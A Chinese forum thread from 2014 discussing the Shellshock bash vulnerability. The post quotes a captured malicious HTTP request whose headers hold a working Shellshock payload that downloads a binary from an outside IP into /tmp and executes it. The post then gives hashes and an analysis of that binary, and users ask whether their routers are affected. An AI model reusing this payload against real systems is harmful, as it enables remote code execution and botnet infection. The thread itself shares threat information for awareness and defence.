GET./.HTTP/1.0 | |
.User-Agent:.Thanks-Rob | |
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Accept:.*/* | |
$ file nginx | |
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped | |
$ md5sum nginx | |
5924bcc045bb7039f55c6ce29234e29a nginx | |
$ sha256sum nginx | |
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx | |
Looking at string variables, it appears to be a kernel exploit with a CnC component. | |
- found by @yinettesys |
![]() |
1
kfll 2014-09-27 10:22:41 +08:00 via Android
…据我浅薄的理解似乎只要有 bash 都会受影响…比如 android 就有…
|
![]() |
2
zhujinliang 2014-09-27 10:27:37 +08:00
有人试过 openwrt 之类的路由固件受影响么?busybox,而且 luci 是 cgi 程序
|
![]() |
3
palxex OP ![]() @kfll 谢谢,我也查到了这台信息。不过手上的小米是没有的,家里的极路由也没有——但都有busybox ash。我担心的是这篇是不是说busybox本身已被攻破?
@zhujinliang 测试了家里的极路由1(开了ssh能看文件系统),用乌云的那个dumper代码测试没问题,但更深的我就测不出来了——毕竟不是专业人士。 |